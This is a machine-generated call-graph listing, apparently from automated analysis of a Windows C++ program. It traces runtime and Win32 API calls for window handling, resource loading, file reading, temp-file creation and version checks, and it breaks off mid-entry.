59339->59331 59340 fbc550 59384 fb1810 38 API calls 59340->59384 59342 fbc58f 59385 eb8390 38 API calls 59342->59385 59344 fbc5a7 59386 e8a3a0 59344->59386 59347 e88ed0 38 API calls 59348 fbc5cf 59347->59348 59351 fbc838 59348->59351 59353 fbc609 std::ios_base::_Ios_base_dtor std::locale::_Setgloballocale 59348->59353 59349 fbc692 59350 fbc6b9 59349->59350 59354 fbc69f 59349->59354 59390 fc5910 59350->59390 59355 108fa4f std::_Throw_Cpp_error 38 API calls 59351->59355 59353->59349 59422 e9bdf0 47 API calls 59353->59422 59428 fc71f0 73 API calls 3 library calls 59354->59428 59358 fbc83d 59355->59358 59356 fbc6ca 59429 e887f0 59356->59429 59362 108fa4f std::_Throw_Cpp_error 38 API calls 59358->59362 59360 fbc663 59423 e886c0 59360->59423 59365 fbc842 59362->59365 59363 fbc701 59439 fb1810 38 API calls 59363->59439 59364 fbc6b6 59364->59350 59366 e887f0 38 API calls 59365->59366 59368 fbc8a9 59366->59368 59441 108c1fc 59368->59441 59369 fbc715 59440 fc3750 51 API calls 4 library calls 59369->59440 59373 fbc8bc 59457 fc71f0 73 API calls 3 library calls 59373->59457 59375 fbc8cb 59376 fbc735 std::ios_base::_Ios_base_dtor 59376->59358 59377 fbc7cf std::ios_base::_Ios_base_dtor 59376->59377 59378 e88ed0 38 API calls 59377->59378 59379 fbc805 59378->59379 59380 e88ed0 38 API calls 59379->59380 59381 fbc817 59380->59381 59382 108a6f5 _ValidateLocalCookies 5 API calls 59381->59382 59383 fbc832 59382->59383 59384->59342 59385->59344 59387 e8a3e0 59386->59387 59387->59387 59388 e886c0 38 API calls 59387->59388 59389 e8a3fa 59388->59389 59389->59347 59458 e88d50 59390->59458 59392 fc59c0 std::locale::_Setgloballocale 59393 fc59f1 LoadStringW 59392->59393 59394 fc5a24 59393->59394 59398 fc5ad6 std::locale::_Setgloballocale 59393->59398 59395 e887f0 38 API calls 59394->59395 59397 fc5a45 59395->59397 59396 fc5b2b LoadStringW 59396->59398 59399 fc5b42 59396->59399 59401 e88ed0 38 API calls 59397->59401 59410 fc5a57 std::ios_base::_Ios_base_dtor 59397->59410 59398->59396 59467 fc5d20 39 API calls 2 library calls 59398->59467 59402 e887f0 38 API calls 59399->59402 59401->59410 59403 fc5b63 59402->59403 59404 e88ed0 38 API calls 59403->59404 59403->59410 59404->59410 59405 fc5c1f std::ios_base::_Ios_base_dtor 59407 108a6f5 _ValidateLocalCookies 5 API calls 59405->59407 59406 fc5c5e 59408 108fa4f std::_Throw_Cpp_error 38 API calls 59406->59408 59409 fc5c57 59407->59409 59411 fc5c63 59408->59411 59409->59356 59410->59405 59410->59406 59412 fc5d0e 59411->59412 59414 fc5ca9 SysFreeString 59411->59414 59415 fc5cf1 SysAllocStringLen 59411->59415 59413 e8b070 2 API calls 59412->59413 59416 fc5d18 59413->59416 59420 108a6f5 _ValidateLocalCookies 5 API calls 59414->59420 59415->59414 59417 fc5d04 59415->59417 59418 e8b070 2 API calls 59417->59418 59418->59412 59421 fc5ced 59420->59421 59421->59356 59422->59360 59424 e88709 59423->59424 59427 e886d4 std::locale::_Locimp::_Locimp 59423->59427 59476 e88580 38 API calls 3 library calls 59424->59476 59426 e8871a 59426->59349 59427->59349 59428->59364 59430 e8888f 59429->59430 59433 e88805 59429->59433 59477 e88db0 38 API calls std::_Throw_Cpp_error 59430->59477 59432 e88812 std::locale::_Locimp::_Locimp 59432->59363 59433->59432 59436 e88d50 3 API calls 59433->59436 59438 e88862 std::locale::_Locimp::_Locimp 59436->59438 59438->59363 59439->59369 59440->59376 59478 108c20a 11 API calls 3 library calls 59441->59478 59443 108c201 59444 108c209 59443->59444 59479 10a3ba8 EnterCriticalSection LeaveCriticalSection std::locale::_Setgloballocale 59443->59479 59444->59373 59446 1094252 59450 109425d 59446->59450 59480 10a3bed 38 API calls 6 library calls 59446->59480 59448 1094286 59482 1095f75 38 API calls std::locale::_Setgloballocale 59448->59482 59449 1094267 IsProcessorFeaturePresent 59451 1094273 59449->59451 59450->59448 59450->59449 59481 108f843 8 API calls 2 library calls 59451->59481 59454 1094290 59483 10a3de0 GetStringTypeW std::locale::_Setgloballocale 59454->59483 59456 10942a3 59456->59373 59457->59375 59459 e88d30 std::_Facet_Register 59458->59459 59459->59458 59460 e88d6d 59459->59460 59461 e88d73 59459->59461 59465 108c321 Concurrency::cancel_current_task RaiseException 59459->59465 59462 108a743 std::_Facet_Register 3 API calls 59460->59462 59466 e88d7c 59461->59466 59468 108a743 59461->59468 59462->59461 59465->59459 59466->59392 59467->59398 59469 108a748 ___std_exception_copy 59468->59469 59470 e88d95 59469->59470 59472 108a764 std::_Facet_Register 59469->59472 59475 109faea EnterCriticalSection LeaveCriticalSection std::_Facet_Register 59469->59475 59470->59392 59473 108c321 Concurrency::cancel_current_task RaiseException 59472->59473 59474 108b490 59473->59474 59475->59469 59476->59426 59478->59443 59479->59446 59480->59450 59481->59448 59482->59454 59483->59456 59484 ec2520 59485 ec2533 std::ios_base::_Ios_base_dtor 59484->59485 59495 108c1bb 59485->59495 59488 ec2549 SetUnhandledExceptionFilter 59489 ec255b 59488->59489 59500 108765e 59489->59500 59503 1087654 59489->59503 59506 1087622 59489->59506 59509 10875fe 59489->59509 59496 108c1fc __set_se_translator 48 API calls 59495->59496 59497 108c1c4 59496->59497 59498 108c1fc __set_se_translator 48 API calls 59497->59498 59499 ec253d 59498->59499 59499->59488 59499->59489 59501 10875ed 59500->59501 59502 10879ed ___delayLoadHelper2@8 17 API calls 59501->59502 59502->59501 59505 10875ed 59503->59505 59504 10879ed ___delayLoadHelper2@8 17 API calls 59504->59505 59505->59504 59507 10875ed 59506->59507 59508 10879ed ___delayLoadHelper2@8 17 API calls 59507->59508 59508->59507 59510 10875ed 59509->59510 59510->59509 59511 10879ed ___delayLoadHelper2@8 17 API calls 59510->59511 59511->59510 59512 fe12f0 59513 fe12fc 59512->59513 59517 fe1303 59512->59517 59514 fe14b0 59515 e8b070 2 API calls 59514->59515 59516 fe14ba 59515->59516 59561 fe1730 RtlFreeHeap GetLastError ___std_exception_destroy 59516->59561 59517->59514 59519 fe136f 59517->59519 59524 fe1359 59517->59524 59525 fe136d 59517->59525 59558 10945db 59519->59558 59520 fe14e7 59521 fe13a9 WideCharToMultiByte 59523 fe13ce GetLastError 59521->59523 59534 fe144c 59521->59534 59528 fe13d9 WideCharToMultiByte 59523->59528 59523->59534 59524->59525 59529 fe1476 59524->59529 59525->59521 59526 fe148a 59525->59526 59530 e8b070 2 API calls 59526->59530 59527 fe1450 59531 fe13ff 59528->59531 59532 fe1480 59528->59532 59533 e8b070 2 API calls 59529->59533 59530->59534 59537 fe141f 59531->59537 59538 fe140d 59531->59538 59543 fe141d 59531->59543 59535 e8b070 2 API calls 59532->59535 59533->59532 59534->59527 59544 fe1b50 GetLastError 59534->59544 59535->59526 59540 10945db ___std_exception_destroy 2 API calls 59537->59540 59538->59526 59538->59543 59539 fe14a6 59542 e8b070 2 API calls 59539->59542 59540->59543 59541 fe142d WideCharToMultiByte 59541->59534 59542->59514 59543->59539 59543->59541 59545 fe1b5a 59544->59545 59546 e8b070 2 API calls 59545->59546 59547 fe1b68 59546->59547 59548 fe1bd1 59547->59548 59549 fe1b8e 59547->59549 59550 fe1bca 59547->59550 59548->59539 59562 fc16f0 59549->59562 59550->59548 59552 fe1c08 DestroyWindow 59550->59552 59552->59539 59553 fe1ba1 59567 fe1dc0 6 API calls 59553->59567 59594 10a2866 59558->59594 59560 10945f3 59560->59525 59561->59520 59589 fc0ca0 LoadLibraryW 59562->59589 59565 fc0ca0 3 API calls 59566 fc1720 SendMessageW SendMessageW 59565->59566 59566->59553 59568 fe1e4b SetWindowPos 59567->59568 59569 fe1e44 59567->59569 59570 108a6f5 _ValidateLocalCookies 5 API calls 59568->59570 59569->59568 59571 fe1bab 59570->59571 59572 f05ed0 GetWindowLongW 59571->59572 59573 f05f32 GetWindow 59572->59573 59574 f05f29 GetParent 59572->59574 59575 f05f3b GetWindowRect 59573->59575 59574->59575 59576 f05fb9 GetParent 59575->59576 59577 f05f4f 59575->59577 59587 f05f9a SetWindowPos 59576->59587 59578 f05f53 GetWindowLongW 59577->59578 59579 f05f68 MonitorFromWindow 59577->59579 59578->59579 59581 f05f78 GetMonitorInfoW 59579->59581 59583 f05fb2 59579->59583 59582 f05f8e 59581->59582 59581->59583 59584 f05fa5 GetWindowRect 59582->59584 59582->59587 59585 108a6f5 _ValidateLocalCookies 5 API calls 59583->59585 59584->59587 59586 f06082 59585->59586 59586->59539 59587->59583 59590 fc0cfa GetProcAddress 59589->59590 59591 fc0d0c 59589->59591 59590->59591 59592 fc0d88 FreeLibrary 59591->59592 59593 fc0d96 59591->59593 59592->59593 59593->59565 59595 10a2871 RtlFreeHeap 59594->59595 59597 10a2893 __dosmaperr 59594->59597 59596 10a2886 GetLastError 59595->59596 59595->59597 59596->59597 59597->59560 59598 1087586 59599 1087525 59598->59599 59600 10879ed ___delayLoadHelper2@8 17 API calls 59599->59600 59600->59599 59601 fe6b30 59602 fe6b6b SetFilePointer 59601->59602 59606 fe6e12 59601->59606 59603 fe6b96 GetLastError 59602->59603 59604 fe6c22 59602->59604 59634 fc0af0 66 API calls 59603->59634 59605 fe6c48 ReadFile 59604->59605 59604->59606 59608 fe6f06 GetLastError 59605->59608 59629 fe6c68 59605->59629 59683 fc0af0 66 API calls 59608->59683 59609 fe6ba7 59635 fbd840 59609->59635 59614 fe6f17 59615 fbd840 93 API calls 59614->59615 59617 fe6f2e 59615->59617 59684 fce280 64 API calls 59617->59684 59618 fe6f85 59621 e8b070 2 API calls 59618->59621 59619 fe6bda 59623 fe6f8f 59621->59623 59622 fe6e8a 59622->59606 59624 fe6cd6 ReadFile 59625 fe6e45 GetLastError 59624->59625 59624->59629 59681 fc0af0 66 API calls 59625->59681 59627 fe6e56 59628 fbd840 93 API calls 59627->59628 59631 fe6e6d 59628->59631 59629->59605 59629->59606 59629->59608 59629->59618 59629->59622 59629->59624 59629->59625 59639 e8b400 59629->59639 59654 e8aee0 59629->59654 59666 e8ab00 59629->59666 59682 fce280 64 API calls 59631->59682 59634->59609 59685 e97d50 59635->59685 59637 fbd873 59638 fce280 64 API calls 59637->59638 59638->59619 59640 e8b438 59639->59640 59651 e8b48c 59639->59651 59641 108ab55 3 API calls 59640->59641 59642 e8b442 59641->59642 59644 e8b44e GetProcessHeap 59642->59644 59642->59651 59643 108ab55 3 API calls 59645 e8b4a6 59643->59645 59742 108aac4 38 API calls 59644->59742 59653 e8b517 59645->59653 59744 108aac4 38 API calls 59645->59744 59647 e8b47b 59743 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59647->59743 59650 e8b506 59745 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59650->59745 59651->59643 59651->59653 59653->59629 59655 e8aeed 59654->59655 59660 e8aef8 59654->59660 59746 e8ac40 59655->59746 59657 e8b070 2 API calls 59659 e8afec 59657->59659 59663 e8af36 __dosmaperr std::locale::_Setgloballocale 59660->59663 59664 e8af77 std::locale::_Locimp::_Locimp 59660->59664 59751 e8ae70 39 API calls 59660->59751 59662 e8afcf 59662->59629 59663->59664 59752 108fa3f 38 API calls ___std_exception_copy 59663->59752 59664->59657 59664->59662 59668 e8ab14 59666->59668 59667 e8ab27 59667->59629 59668->59667 59669 e8abd3 59668->59669 59674 e8ab51 std::locale::_Setgloballocale 59668->59674 59755 e8ae10 39 API calls 59669->59755 59671 e8abd8 59673 e8ab00 39 API calls 59671->59673 59672 e8ab77 __dosmaperr 59753 108fa3f 38 API calls ___std_exception_copy 59672->59753 59675 e8ac16 59673->59675 59674->59672 59676 e8ab96 std::locale::_Locimp::_Locimp 59674->59676 59679 e8abb8 __dosmaperr 59674->59679 59675->59629 59676->59629 59678 e8ab87 59678->59629 59679->59676 59754 108fa3f 38 API calls ___std_exception_copy 59679->59754 59681->59627 59682->59622 59683->59614 59684->59622 59686 e97daa 59685->59686 59687 e97f15 59685->59687 59689 e97dfc 59686->59689 59692 e97dcc 59686->59692 59688 e8b070 2 API calls 59687->59688 59690 e97f1f 59688->59690 59695 e8b400 45 API calls 59689->59695 59706 e97e21 59689->59706 59739 e8ae10 39 API calls 59690->59739 59694 e8ab00 39 API calls 59692->59694 59693 e97f24 59696 e8b070 2 API calls 59693->59696 59697 e97dd4 59694->59697 59695->59706 59698 e97f2e 59696->59698 59697->59637 59699 e8b070 2 API calls 59698->59699 59700 e97f38 59699->59700 59701 e97f7d 59700->59701 59714 e9800e __Getctype ___std_exception_copy 59700->59714 59702 e97fd5 GetWindowLongW 59701->59702 59703 e97f84 59701->59703 59705 e97fe2 NtdllDefWindowProc_W 59702->59705 59704 e97fc0 NtdllDefWindowProc_W 59703->59704 59710 e97f98 GetWindowLongW 59703->59710 59707 e9825a 59704->59707 59705->59707 59706->59690 59706->59693 59706->59698 59713 e97e56 59706->59713 59709 108a6f5 _ValidateLocalCookies 5 API calls 59707->59709 59711 e98282 59709->59711 59710->59704 59712 e97fa8 GetWindowLongW SetWindowLongW 59710->59712 59711->59637 59712->59704 59713->59698 59726 e97ea8 __dosmaperr std::locale::_Setgloballocale 59713->59726 59715 e98223 59714->59715 59716 e9808c SetWindowTextW 59714->59716 59715->59707 59718 10945db ___std_exception_destroy 2 API calls 59715->59718 59719 e980a8 59716->59719 59720 e980ae 59716->59720 59717 e97ec4 std::locale::_Locimp::_Locimp 59717->59637 59718->59707 59719->59720 59721 e98136 59720->59721 59722 e980c0 GlobalAlloc 59720->59722 59721->59715 59741 e98520 74 API calls 7 library calls 59721->59741 59722->59721 59723 e980d0 GlobalLock 59722->59723 59729 e980e3 __dosmaperr std::locale::_Setgloballocale 59723->59729 59725 e98169 59727 e98207 59725->59727 59732 e98190 SetWindowLongW 59725->59732 59726->59717 59738 108fa3f 38 API calls ___std_exception_copy 59726->59738 59727->59715 59731 e980e8 std::locale::_Locimp::_Locimp 59729->59731 59740 108fa3f 38 API calls ___std_exception_copy 59729->59740 59733 e9811c GlobalUnlock 59731->59733 59734 e981a7 59732->59734 59733->59721 59735 e981ed NtdllDefWindowProc_W 59734->59735 59736 10945db ___std_exception_destroy 2 API calls 59734->59736 59735->59707 59737 e981ea 59736->59737 59737->59735 59738->59717 59739->59693 59740->59731 59741->59725 59742->59647 59743->59651 59744->59650 59745->59653 59747 e8ac78 59746->59747 59748 e8ac87 59746->59748 59747->59748 59749 e8b070 2 API calls 59747->59749 59748->59629 59750 e8acfc 59749->59750 59751->59663 59752->59664 59753->59678 59754->59676 59755->59671 59756 e9c1b1 59757 e9c23e 59756->59757 59758 e9c26b GetWindowLongW CallWindowProcW 59757->59758 59759 e9c251 CallWindowProcW 59757->59759 59762 e9c2bb 59757->59762 59760 e9c29e GetWindowLongW 59758->59760 59758->59762 59759->59762 59761 e9c2ad SetWindowLongW 59760->59761 59760->59762 59761->59762 59763 eaf6f0 59830 eafec0 59763->59830 59767 eaf74a 59768 e887f0 38 API calls 59767->59768 59769 eaf76e 59768->59769 59926 e87cf0 59769->59926 59771 eaf787 59772 e88ed0 38 API calls 59771->59772 59773 eaf7ca 59772->59773 59774 eaf801 std::ios_base::_Ios_base_dtor 59773->59774 59776 eafbd0 59773->59776 59775 e887f0 38 API calls 59774->59775 59777 eaf83b 59775->59777 59778 108fa4f std::_Throw_Cpp_error 38 API calls 59776->59778 59779 e87cf0 38 API calls 59777->59779 59780 eafbd5 59778->59780 59784 eaf854 59779->59784 59781 108fa4f std::_Throw_Cpp_error 38 API calls 59780->59781 59782 eafbda 59781->59782 59783 108fa4f std::_Throw_Cpp_error 38 API calls 59782->59783 59785 eafbdf 59783->59785 59788 e88ed0 38 API calls 59784->59788 59786 e8b070 2 API calls 59785->59786 59787 eafbe9 59786->59787 59789 108fa4f std::_Throw_Cpp_error 38 API calls 59787->59789 59790 eaf89a 59788->59790 59791 eafbee 59789->59791 59790->59780 59792 eaf8d1 std::ios_base::_Ios_base_dtor 59790->59792 59937 101afd0 59791->59937 59953 fceb30 203 API calls 59792->59953 59795 e887f0 38 API calls 59796 eafcad 59795->59796 59942 101bc50 59796->59942 59800 eafe7d 59957 101b270 38 API calls std::ios_base::_Ios_base_dtor 59800->59957 59801 eafead 59807 108fa4f std::_Throw_Cpp_error 38 API calls 59801->59807 59806 eafe8c 59810 108a6f5 _ValidateLocalCookies 5 API calls 59806->59810 59811 eafeb2 59807->59811 59813 eafea9 59810->59813 59815 e887f0 38 API calls 59820 eafcc9 std::ios_base::_Ios_base_dtor 59815->59820 59816 e886c0 38 API calls 59816->59820 59820->59800 59820->59801 59820->59815 59820->59816 59826 e87cf0 38 API calls 59820->59826 59954 101aef0 44 API calls 59820->59954 59955 e896d0 38 API calls 59820->59955 59956 e881e0 38 API calls 2 library calls 59820->59956 59826->59820 59831 eafef7 59830->59831 59839 eaf727 59830->59839 59832 108ab55 3 API calls 59831->59832 59833 eaff01 59832->59833 59833->59839 59958 fce590 46 API calls ___std_exception_destroy 59833->59958 59835 eaff19 59959 108aac4 38 API calls 59835->59959 59837 eaff23 59960 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59837->59960 59840 eaff50 59839->59840 59841 e887f0 38 API calls 59840->59841 59842 eaffb3 std::ios_base::_Ios_base_dtor 59841->59842 59843 e887f0 38 API calls 59842->59843 59844 eb09ee 59842->59844 59850 eb004b std::ios_base::_Ios_base_dtor 59843->59850 59845 108fa4f std::_Throw_Cpp_error 38 API calls 59844->59845 59846 eb0a1b 59845->59846 59847 e88ed0 38 API calls 59846->59847 59848 eb0a55 59847->59848 59848->59767 59849 e887f0 38 API calls 59851 eb00e0 std::ios_base::_Ios_base_dtor 59849->59851 59850->59849 59852 e887f0 38 API calls 59851->59852 59853 eb0175 std::ios_base::_Ios_base_dtor 59852->59853 59854 e887f0 38 API calls 59853->59854 59855 eb020a std::ios_base::_Ios_base_dtor 59854->59855 59856 e887f0 38 API calls 59855->59856 59858 eb029f std::ios_base::_Ios_base_dtor 59856->59858 59857 e887f0 38 API calls 59859 eb0331 59857->59859 59858->59857 59860 e88ed0 38 API calls 59859->59860 59862 eb0396 std::ios_base::_Ios_base_dtor 59860->59862 59861 e887f0 38 API calls 59863 eb0416 59861->59863 59862->59861 59864 e88ed0 38 API calls 59863->59864 59866 eb0483 std::ios_base::_Ios_base_dtor 59864->59866 59865 e887f0 38 API calls 59867 eb0503 59865->59867 59866->59865 59868 e88ed0 38 API calls 59867->59868 59870 eb0573 std::ios_base::_Ios_base_dtor 59868->59870 59869 e8b400 45 API calls 59873 eb05de 59869->59873 59870->59869 59871 eb09e4 59872 e8b070 2 API calls 59871->59872 59872->59844 59873->59871 59874 eb061a 59873->59874 59877 eb062b 59873->59877 59961 e8a880 59874->59961 59875 e8aee0 39 API calls 59878 eb0629 59875->59878 59877->59875 59877->59877 59976 ea5bf0 59878->59976 59880 eb0669 59881 e8b400 45 API calls 59880->59881 59882 eb06b0 59881->59882 59882->59871 59883 eb06ec 59882->59883 59885 eb06fd 59882->59885 59884 e8a880 48 API calls 59883->59884 59887 eb06fb 59884->59887 59885->59885 59886 e8aee0 39 API calls 59885->59886 59886->59887 59888 ea5bf0 39 API calls 59887->59888 59889 eb073b 59888->59889 59985 eaeec0 46 API calls 59889->59985 59891 eb0794 59892 e8aee0 39 API calls 59891->59892 59893 eb07d3 59892->59893 59894 e8aee0 39 API calls 59893->59894 59895 eb0811 59894->59895 59896 e8b400 45 API calls 59895->59896 59897 eb082a 59896->59897 59897->59871 59898 eb0838 59897->59898 59899 eb0877 59898->59899 59900 eb0866 59898->59900 59902 e8aee0 39 API calls 59899->59902 59901 e8a880 48 API calls 59900->59901 59903 eb0875 59901->59903 59902->59903 59986 fb8c40 39 API calls _ValidateLocalCookies 59903->59986 59905 eb08c2 59906 e8aee0 39 API calls 59905->59906 59907 eb093c 59906->59907 59987 fd3340 39 API calls 3 library calls 59907->59987 59909 eb0951 59910 ea5bf0 39 API calls 59909->59910 59911 eb0960 59910->59911 59912 e88ed0 38 API calls 59911->59912 59913 eb097b 59912->59913 59914 e88ed0 38 API calls 59913->59914 59915 eb098a 59914->59915 59916 e88ed0 38 API calls 59915->59916 59917 eb0999 59916->59917 59918 e88ed0 38 API calls 59917->59918 59919 eb09a8 59918->59919 59920 e88ed0 38 API calls 59919->59920 59921 eb09b7 59920->59921 59922 e88ed0 38 API calls 59921->59922 59923 eb09c9 59922->59923 59924 108a6f5 _ValidateLocalCookies 5 API calls 59923->59924 59925 eb09e0 59924->59925 59925->59767 59927 e87d17 59926->59927 59928 e87d97 59927->59928 59932 e87d22 59927->59932 59992 e88db0 38 API calls std::_Throw_Cpp_error 59928->59992 59930 e87d2e 59930->59771 59932->59930 59934 e88d50 3 API calls 59932->59934 59935 e87d70 std::locale::_Locimp::_Locimp 59934->59935 59935->59771 59938 108a743 std::_Facet_Register 3 API calls 59937->59938 59939 101b090 59938->59939 59993 101b360 59939->59993 59943 101b360 38 API calls 59942->59943 59944 101bc5f 59943->59944 59945 101bc7b 59944->59945 59947 e8b770 38 API calls 59944->59947 60015 101bd20 59945->60015 59947->59945 59950 101bc92 60055 101c3f0 57 API calls 5 library calls 59950->60055 59952 101bc9d 59952->59820 59954->59820 59955->59820 59956->59820 59957->59806 59958->59835 59959->59837 59960->59839 59988 e8a680 10 API calls 59961->59988 59963 e8a890 59964 e8a912 59963->59964 59965 e8a896 FindResourceW 59963->59965 59964->59878 59965->59964 59966 e8a8ad 59965->59966 59989 e8a740 LoadResource LockResource SizeofResource 59966->59989 59968 e8a8b7 59968->59964 59969 e8a8de 59968->59969 59990 e8ae70 39 API calls 59968->59990 59991 1094057 38 API calls 3 library calls 59969->59991 59972 e8a8ee 59973 e8a8fe 59972->59973 59974 e8b070 2 API calls 59972->59974 59973->59878 59975 e8a924 59974->59975 59977 ea5c5f 59976->59977 59979 ea5c06 59976->59979 59977->59880 59978 ea5c4c 59980 e8aee0 39 API calls 59978->59980 59979->59978 59981 ea5c16 59979->59981 59982 ea5c57 59980->59982 59983 e8ab00 39 API calls 59981->59983 59982->59880 59984 ea5c1c 59983->59984 59984->59880 59985->59891 59986->59905 59987->59909 59988->59963 59989->59968 59990->59969 59991->59972 60002 e8b770 59993->60002 59995 101b37b 59996 e88ed0 38 API calls 59995->59996 59998 101b393 59995->59998 59996->59995 59997 101b3b4 60001 eafc82 59997->60001 60013 e89b50 38 API calls 2 library calls 59997->60013 59998->59997 60012 101e860 38 API calls std::ios_base::_Ios_base_dtor 59998->60012 60001->59795 60006 e8b782 std::locale::_Locimp::_Locimp 60002->60006 60007 e8b7bf 60002->60007 60003 e8b87c 60014 e88db0 38 API calls std::_Throw_Cpp_error 60003->60014 60006->59995 60007->60003 60008 e88d50 3 API calls 60007->60008 60010 e8b80d std::locale::_Locimp::_Locimp 60008->60010 60009 e8b85f std::ios_base::_Ios_base_dtor 60009->59995 60010->60009 60011 108fa4f std::_Throw_Cpp_error 38 API calls 60010->60011 60011->60003 60012->59997 60013->59997 60016 101c18e 60015->60016 60017 101bd90 60015->60017 60019 108a6f5 _ValidateLocalCookies 5 API calls 60016->60019 60018 e887f0 38 API calls 60017->60018 60020 101bdac 60018->60020 60021 101bc8b 60019->60021 60022 101bf85 60020->60022 60042 101bdbb std::ios_base::_Ios_base_dtor 60020->60042 60054 101c1c0 48 API calls _ValidateLocalCookies 60021->60054 60024 e886c0 38 API calls 60022->60024 60023 101becf 60056 e8a300 60023->60056 60024->60023 60025 e886c0 38 API calls 60025->60042 60028 e8a3a0 38 API calls 60030 101bef9 60028->60030 60029 e887f0 38 API calls 60029->60042 60032 e886c0 38 API calls 60030->60032 60033 101bf15 60032->60033 60035 e88ed0 38 API calls 60033->60035 60034 e8a3a0 38 API calls 60034->60042 60036 101bf21 60035->60036 60037 e88ed0 38 API calls 60036->60037 60038 101bf2d 60037->60038 60039 e886c0 38 API calls 60038->60039 60052 101bf5e std::ios_base::_Ios_base_dtor 60038->60052 60041 101bf40 60039->60041 60040 e88ed0 38 API calls 60040->60042 60044 e886c0 38 API calls 60041->60044 60042->60023 60042->60025 60042->60029 60042->60034 60042->60040 60045 101c1b1 60042->60045 60064 eb8390 38 API calls 60042->60064 60043 101c131 60046 e88ed0 38 API calls 60043->60046 60044->60052 60047 108fa4f std::_Throw_Cpp_error 38 API calls 60045->60047 60046->60016 60049 101c1b6 60047->60049 60048 e887f0 38 API calls 60048->60052 60051 e886c0 38 API calls 60051->60052 60052->60043 60052->60045 60052->60048 60052->60051 60053 e88ed0 38 API calls 60052->60053 60065 eb8390 38 API calls 60052->60065 60053->60052 60054->59950 60055->59952 60057 e8a340 60056->60057 60057->60057 60058 e8a399 60057->60058 60059 e8a360 60057->60059 60070 e88db0 38 API calls std::_Throw_Cpp_error 60058->60070 60066 e884d0 60059->60066 60063 e8a377 60063->60028 60064->60042 60065->60052 60067 e88500 60066->60067 60069 e8852e std::locale::_Locimp::_Locimp 60066->60069 60068 e88d50 3 API calls 60067->60068 60068->60069 60069->60063 60074 e87b33 60077 108aac4 38 API calls 60074->60077 60076 e87b3d 60077->60076 60078 fc7f80 60087 fc7a40 60078->60087 60080 fc7fc1 GetFileVersionInfoSizeW 60081 fc803e GetLastError 60080->60081 60082 fc7fda 60080->60082 60086 fc7fea 60081->60086 60085 fc7ff1 GetFileVersionInfoW 60082->60085 60082->60086 60083 fc8057 60084 fc8050 DeleteFileW 60084->60083 60085->60081 60085->60086 60086->60083 60086->60084 60126 fc2a50 60087->60126 60090 fc7a8c SHGetFolderPathW 60093 fc7aaa 60090->60093 60091 fc7d4c 60092 108a6f5 _ValidateLocalCookies 5 API calls 60091->60092 60094 fc7da5 60092->60094 60093->60091 60133 e933c0 60093->60133 60094->60080 60096 fc7b22 60190 fae210 60096->60190 60099 e8b400 45 API calls 60100 fc7b4a 60099->60100 60101 fc7dab 60100->60101 60106 fc7b58 60100->60106 60102 e8b070 2 API calls 60101->60102 60103 fc7db5 60102->60103 60104 e8b070 2 API calls 60103->60104 60105 fc7dbf 60104->60105 60107 fc7deb DeleteFileW 60105->60107 60110 fc7df3 60105->60110 60108 fc7b86 60106->60108 60109 fc7b97 60106->60109 60107->60110 60111 e8a880 48 API calls 60108->60111 60112 e8aee0 39 API calls 60109->60112 60110->60080 60113 fc7b95 60111->60113 60112->60113 60114 e88ed0 38 API calls 60113->60114 60115 fc7bcf 60114->60115 60116 e88ed0 38 API calls 60115->60116 60117 fc7bde 60116->60117 60117->60103 60118 fc7c12 std::locale::_Setgloballocale 60117->60118 60119 fc7bfe 60117->60119 60120 fc7c2b GetTempFileNameW 60118->60120 60119->60118 60212 ea5d30 60119->60212 60123 fc7c4f 60120->60123 60122 fc7cc8 Wow64DisableWow64FsRedirection CopyFileW 60124 fc7d17 60122->60124 60123->60122 60123->60123 60124->60091 60125 fc7d2c Wow64RevertWow64FsRedirection 60124->60125 60125->60091 60219 fc2b90 60126->60219 60129 108ab55 3 API calls 60131 fc2aa0 std::locale::_Setgloballocale 60129->60131 60130 fc2b35 60130->60090 60130->60091 60131->60130 60227 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 60131->60227 60134 e93466 60133->60134 60135 e9342e 60133->60135 60164 e93681 std::ios_base::_Ios_base_dtor 60134->60164 60269 fb9280 60134->60269 60136 108ab55 3 API calls 60135->60136 60137 e93438 60136->60137 60137->60134 60286 108aac4 38 API calls 60137->60286 60139 e87cf0 38 API calls 60141 e936b4 60139->60141 60145 108a6f5 _ValidateLocalCookies 5 API calls 60141->60145 60143 e935ce GetTempPathW 60154 e935e2 60143->60154 60144 e93483 60148 e934da 60144->60148 60151 108ab55 3 API calls 60144->60151 60146 e936de 60145->60146 60146->60096 60147 e93455 60287 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 60147->60287 60149 e934fe GetWindowsDirectoryW 60148->60149 60156 e934ea 60148->60156 60289 109454d 38 API calls 2 library calls 60149->60289 60152 e9349a 60151->60152 60152->60148 60155 e934a6 GetModuleHandleW GetProcAddress 60152->60155 60157 e887f0 38 API calls 60154->60157 60154->60164 60288 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 60155->60288 60156->60154 60162 e9353a 60156->60162 60159 e93633 60157->60159 60294 fae420 47 API calls _ValidateLocalCookies 60159->60294 60160 e934d7 60160->60148 60290 fb9680 13 API calls 60162->60290 60163 e9364b 60163->60164 60166 e936e5 60163->60166 60164->60139 60167 108fa4f std::_Throw_Cpp_error 38 API calls 60166->60167 60169 e936ea 60167->60169 60168 e93563 60291 fb9680 13 API calls 60168->60291 60172 e933c0 90 API calls 60169->60172 60171 e9357a 60292 fb9c10 8 API calls 60171->60292 60174 e93734 60172->60174 60176 e87cf0 38 API calls 60174->60176 60175 e93585 60177 e93589 CreateDirectoryW 60175->60177 60178 e935bd 60175->60178 60179 e9374b 60176->60179 60177->60178 60293 fb9530 7 API calls ___std_exception_destroy 60178->60293 60181 e88ed0 38 API calls 60179->60181 60183 e9376c 60181->60183 60182 e935cc 60182->60154 60295 e937c0 95 API calls 3 library calls 60183->60295 60185 e9377b 60186 e88ed0 38 API calls 60185->60186 60187 e93793 60186->60187 60188 108a6f5 _ValidateLocalCookies 5 API calls 60187->60188 60189 e937ad 60188->60189 60189->60096 60191 fae266 60190->60191 60197 fae273 60190->60197 60192 e87cf0 38 API calls 60191->60192 60193 fae26e 60192->60193 60196 108a6f5 _ValidateLocalCookies 5 API calls 60193->60196 60194 fae3e4 60195 e87cf0 38 API calls 60194->60195 60195->60193 60199 fae413 60196->60199 60197->60194 60198 